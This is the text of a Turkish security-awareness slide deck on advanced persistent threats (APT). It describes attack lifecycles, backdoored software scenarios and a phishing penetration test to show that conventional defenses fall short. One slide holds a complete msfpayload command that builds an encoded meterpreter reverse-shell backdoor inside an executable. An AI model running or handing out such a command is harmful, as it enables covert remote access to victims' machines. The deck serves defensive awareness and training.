APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği

Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR

Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ [email protected]

APT Saldırıları Karşısında Güvenlik Sistemlerinin Yetersizliği

Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR

Huzeyfe ÖNAL •  Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş<rmacısı @BGA

•  PenetraAon Tester •  Eğitmen – Bilgi Güvenliği AKADEMİSİ – Linux AKADEMİ

•  ÖğreAm Görevlisi Bilgi / Bahçeşehir Üniversitesi

•  Blogger -‐ www.lifeoverip.net


Amaç •  Günümüz güvenlik problemlerinin temelini oluşturan son kullanıcı farkındalık eksikliği ve zararlı yazılımlar karşısında Firewall/IPS/AnAvirüs gibi klasik siber güvenlik sistemlerinin yetersizliğinin anlaşılması.


!! Uyarı !!

Bu sunumda geçen tüm olaylar ve ekran görüntülerinin gerçek kişilerle ilgisi yoktur, sanal

dünyadan alınmış[r.

Fireeye APT Etkinliği / Istanbul BGA (BİLGİ GÜVENLİĞİ AKADEMİSİ) |BGA.COM.TR

10 Sene Önce Siber Dünya


Geleneksel Güvenlik Yaklaşımı •  Network, işleAm sistemi ve servis güvenliği •  Router(ACL), Firewall –  Intrusion DetecAon System •  Intrusion PrevenAon System

»  ....

•  Bütçenin tamamına yakını standart savunma sistemleri için ayrılır.

•  Kullanıcılara yönelik tehdit genellikle es geçilir – “...Onun zaten farkındayız” yaklaşımı

•  GerçekleşArilen güvenlik testleri kontrol listesindeki bir maddeyi daha geçebilmek için yap<rılır.


Katmanlı Güvenlik Mimarisi(?) •  Güvenlik ürünleri listesi – Güvenlik duvarı – Saldırı Tespit ve Engelleme Sistemi – AnAvirüs, AnAspam, AnA… – NAC, 802.1x çözümü – DLP

•  Güvenliğin artması para harcama ile doğru oran<lı değildir

•  Katmanlı güvenlik mimarisini yanlış anlama


Sorularla Güvenliğimiz… •  Kaç kişi/kurum son bir yıl içerisinde APT benzeri sofisAke bir saldırıya maruz kaldı

•  Daha da önemlisi kaç kişi/kurum bu saldırıya maruz kaldığını tespit ej ve nasıl/ne zaman?

•  Daha daha da önemlisi kaç kurum bu Ap saldırıyla karşı karşıya kaldığından habersiz?

•  BGA’dan örnekleri… – Kamu / Özel sektör


APT Kavramı •  A.P.T (Advanced Persistent Threat) 2010 yılında gündemimize girmiş “görece olarak” yeni bir konu. – Yeni arayışlar ve sektöre heyecan katmak amacıyla gelişArilmiş bir konu mu?

– Çok daha öncesinden varolan fakat yeteri kadar önem verilmeyen, büyük firmaları hedef alındığında gerçek önemi ortaya çıkan bir konu mu?

•  Teknik olarak eski yöntemler, yeni moAvasyonlar •  Güvenlikcilerin 0-‐3 yenik başladığı bir kavram


APT ile Mücadele •  APT kolay tanımlanabilir bir konu olmadığı için mücadelesi de zordur,

•  Mücadelede en önemli husus kime karşı neyin mücadelesinin verildiğidir – Saldırgan gibi düşünebilmek ve onların yeteneklerini simule etmek hayaA öneme sahipAr.

•  Tanımlanabilir tehditleri engellemek kolaydır •  Hata: Kolay tanımlanabilir olmayan riskleri eski man<kla çözmeye kalkmak… – AV firmalarının APT ile uğraşması…


APT Saldırı Anatomisi

Kaynak: RSA güv. konferansı


APT Yaşam Döngüsü Faz Ak^vite Detaylar

I.   Faz Keşif, hedef belirleme Hedefin ve hedefe ulaşılabilecek yolların tespit edilmesi

II. Faz Oltalama e-‐postasının gönderilmesi

Genellikle bu yöntem tercih edilir (kolay, zahmetsiz ve az teknik detay gerekArdiğinden)

III. Faz Hedefle irAbata geçme Hedef sisteme arka kapı yükleme

IV. Faz Hak yükseltme, hedef alanını genişletme

Hedef sistemde daha yüksek yetkili kullanıcı haklarına geçiş, farklı ağları keşif

V. Faz Veri Kaçırma Hedef sistemden ilgili verilerin şifrelenerek dışarı çıkar<lması, yedeklenmesi

VI. Faz Erişimi kalıcı kılma İstenildiğinde tekrar bağlanılabilecek bir yapıyı kurup , logların ve diğer delillerin silinmesi.


APT MoAvasyonu ve Akçeli İşler •  APT saldırılarında en önemli bileşen saldırganın moAvasyonudur. – Bu moAvasyon genellikle maddi karşılık<r.

•  Saldırganın moAvasyon durumuna göre APT saldırısı 1 gün de sürebilir 4 yıl da sürebilir. – 0 day exploit çıkması için beklenen süre v.s – Hacklenen 3. parA yazılımın güncellenmesini bekleme


Türkiye’den İstaAsAkler


Hatalı APT Yaklaşımları… •  Bize birşey olmaz yaklaşımı – Saldırgan bula bula bizi mi bulacakJ

•  Sadece ürünle çözmeye çalışmak •  Sadece ağ trafiği dinleyerek çözmeye çalışmak •  Farkındalık+APT ürünü+log yöneAmi+offsec


Örnek APT Senaryo İncelemeleri

1 2


Senaryo-‐I •  Sebep:Farkındalık ve son kullanıcı güvenlik önlemlerinin yetersiz olması

•  Hikaye: Saldırgan ipsec VPN kullanan firmaları hedef alarak erişim bilgilerini toplayarak bunları satmak ister. Bunun için bir adet tuzak sistem kurar (kurulu sistemi hackler) ve arama motorları sonuçlarına güvenen son kullanıcıları avlamaya başlar.

•  Günün sonunda başladığı yerden bir mil ötede hiç hesaba katmadığı firmaların iç ağlarına erişip hassas çizimleri başkalarına para karşılığında satar


•  Senaryo internet üzerinden bir exe dosyasının indirilmesi ile başlar –  Internet üzerinden exe yasaklanabilir (?)

•  Senaryodaki .exe yerine .pdf, .zip, xls, .doc ve benzeri uzan<lar kullanılabilir veya uzan<ya gerek olmadan yeni çıkmış 0 day açıklardan biri kullanılarak Explorer ve benzeri browserlar üzerinden işlem yap<rılabilir.


Keşif, Bilgi Toplama ve Tuzak Adımı •  Saldırgan Google kullanarak VPN istemcisi ara<r ve ilk sayfada çıkan linke <klayarak programı indirir

•  Bilgisayarına programı kurar ve VPN bağlan<sını başla<r.

•  Saldırgan program çalış<ğında son kullanıcı bilgisayarına erişim sağlar


İlk Adım Zorlukları •  Google’da ilk sayfada çıkan sistemin hacklenmesi – SSL heartbleed açıklığı sonrası durum

•  İlk sayfada çıkan sistem hacklenemiyorsa yeni bir site kurup Black Seo yöntemleri ile ilk sayfaya alınması

•  Hemen her gün yeni güvenlik zafiyetleri yayınlanır


VPN İstemci Programına Arka kapı YerleşArme •  msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.106 R | msfencode -‐t exe -‐x template_x86_windows.exe -‐k -‐o nt_backdoor.exe -‐e x86/shikata_ga_nai -‐c 5


AnA-‐(Virus/Malware/…) Atlatma Özelliği Ekleme

•  Klasik güvenlik korumaları Aspirin gibidir. Bilinen basit durumlar için işe yarar.

•  ÜreAlen zararlı yazılımların %80 civarının yaşam süresi 3 saajr. Bunun içinde tek kullanımlık malware oranı %70’dir.


AV’ler Tara}ndan Tanınmaz Zararlı Oluşturma


Örnek Uygulama Çık<sı


Bekleme Süresi •  APT saldırılarında en önemli hususlardan biri saldırganın acelesinin olmamasıdır.

•  Saldırgan ağını hazırlar, kurar ve uzun bir süre bekler.

•  Örnek senaryoda 6 ay civarında bir bekleme süresi olduğu tespit edilmişAr.


Hassas Bilgilerin Elde Edilmesi


FTP Erişimi ve FTP’deki Dosyalara Arka Kapı YerleşArme

•  Saldırgan elde ejği erişim bilgilerini kullanarak FTP sunucuya bağlanır ve FTP sunucuda en son güncellenen dosyaları inceleyerek orjinallerini arka kapılı sürümleriyle değişArir.

•  3 gün sonra ip adresi X.y.z.t’li bir istemcinin merkezi komuta sistemine bağlandığını görür.

•  Hızlıca ilgili kullanıcının bilgisayarına erişim sağlar •  Bilgisayar firmanın help desk birimi çalışanına aijr ve en yetkili kullanıcı hesabı bilgisayara login olmuştur.

•  Bellek dökümü yaparak parolanın açık hali elde edilir


Sunucu Taraflı bir APT •  Saldırgan çok bilinen bir blog/cms sisteminin Türkiye sitesini hackler – Parola tahmini

•  Bir sonraki sürüm için zaman sayar ve yeni sürüm çık<ğında siteye eklenen yeni Türkçe sürüm dosyaları içine bir adet arka kapı barındıran php dosyası ekler, hash değerlerini değişArir.

•  Bir ha�a sonra ilgili dosyanın download sayısı 173.000 olmuştur.

•  Saldırgan tek bir harekeA ile 173.000 sisteme arka kapı bırakır.


Apt devam… •  Sunucu loglarından ilgili dosyaları indiren ip adresleri tespit edilip hangilerinde blog yazılımı kurulu belirlenir ve arka kapıların hangi sistemlerde olduğu tespit edilir.

•  Arka kapı üzerinden sunucu ele geçirilir – Windows uzerinde Apache Admin hakları ile çalışmaktadır

•  DMZ bölgesindeki diger sunuculara PassThe Hash yöntemi ile erişim sağlanır ve veritabanı sunucusundan yerel ağa erişilir…


Türkiye’den Örnek APT TesA ve Sonucu •  Firma ile anlaşma yapılır – Gizlilik sözleşmesinde geçen firma ismi hariç hiç bilgi alınmamış<r.

– Sosyal ağ sitelerinden araş<rma yapılarak hedef 50 kişi belirlenir. (LinkedIN)

– Firmanın twi�er/facebook sayfaları takip edilerek kampanya/duyuru zamanı beklenir.

– Kampanya ile ilgili siteye benzer alan adı alınarak SPF kayıtları, MX kayıtları girilir ve sahte e-‐posta hazırlanır.

•  50 çalışana e-‐posta gönderilir ve beklemeye alınır.


•  Ilk 10 dakika içinde 7 kullanıcı sisteme erişmeye çalışır. •  Hızlıca kullanıcıların hesap bilgileri kullanılarak webmail sistemine erişim sağlanır –  Tüm kullanıcı bilgisi alınır (bağlı olunan birim ve tel numaraları dahil)

•  Anahtar kelime araması gerçekleşArilir (*.pcf) •  Bir adet vpn config ve user/pass elde edilir •  Vpn kurulumu icin gece 03:00 beklenir •  VPN kurulur yerel ağa bağlan< sağlanır, RDP üzerinden parolası alınan bilgisayara bağlanılır.

•  AV durduruldu, kalıcı arka kapı yüklendi, yerel ağ portları tarandı DB bulundu, erişim sağlandı…


Kuruma Ödev •  Testleri tamamladıktan sonra saldırı tespit ve engelleme sistemini uyaracak çeşitli sahte ataklar düzenlendi.

•  Kuruma bir ha�a içerisinde gerçekleşArilen siber saldırı simulasyonu sonucunda eldeki bulguları soruldu –  IPS logları haric elle tutulur hicbir bilgi gelmedi.

•  Kısacası kurum yap<ğı milyon dolarlık ya<rımın gerçek bir APT saldırısı karşısında kendisini savunamayacağını gördü…


Sonuç •  Siber dünyada güvenliğimiz sadece bize ve sınırlarımıza bağlı değildir.

•  Özellikle hizmet alınan 3. parA firmalar ve bunların erişimleri/yetkileri büyük problemdir.

•  Internet üzerinden elde edilen veya yerel ağda dolaşımda olan her tür çalış<rılabilir dosya kontrolden geçmeli.

•  APT teknik bir problemden öte iş dünyasını ilgilendiren hassas bir konudur.


İleAşim Bilgileri

• www.lifeoverip.net • Blog.bga.com.tr Blog

• @bgasecurity • @huzeyfeonal Twi�er

• [email protected] • [email protected] İleAşim

APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği

Technology

Transcript of APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği